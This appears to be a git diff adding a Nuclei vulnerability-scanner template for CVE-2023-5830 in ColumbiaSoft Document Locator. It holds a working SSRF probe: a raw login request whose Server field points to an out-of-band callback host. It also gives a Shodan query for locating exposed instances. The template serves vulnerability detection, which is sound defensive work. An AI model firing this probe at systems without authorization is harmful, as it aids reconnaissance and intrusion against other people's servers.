diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml new file mode 100644 index 0000000000..558ceed547 --- /dev/null +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -0,0 +1,68 @@ +id: CVE-2023-5830 +info: + name: ColumbiaSoft DocumentLocator - Improper Authentication + author: Gonski + severity: critical + description: Instances of ColumbiaSoft's Document Locator prior to version 7.2 + SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF + vulnerability. This template identifies vulnerable instances of the + ColumbiaSoft Document Locater application by confirming external DNS + interaction/lookups by modifying the value of the client-side SERVER + parameter at /api/authentication/login. + impact: | + An attacker could exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-5830 + - https://vuldb.com/?ctiid.243729 + - https://github.com/advisories/GHSA-j89v-wm7x-4434 + - https://vuldb.com/?id.243729 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5830 + cwe-id: CWE-287 + epss-score: 0.00091 + epss-percentile: 0.37582 + cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: documentlocator + product: document_locator + shodan-query: 'title:"Document Locator - WebTools"' + tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools + +http: + - raw: + - | + @timeout: 30s + POST /api/authentication/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + + { + "LoginType":"differentWindows", + "User":"{{randstr}}", + "Password":"{{rand_base(5, "abc")}}", + "Domain":"{{randstr}}", + "Server":"{{interactsh-url}}", + "Repository":"{{randstr}}" + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - '"Authorized":false'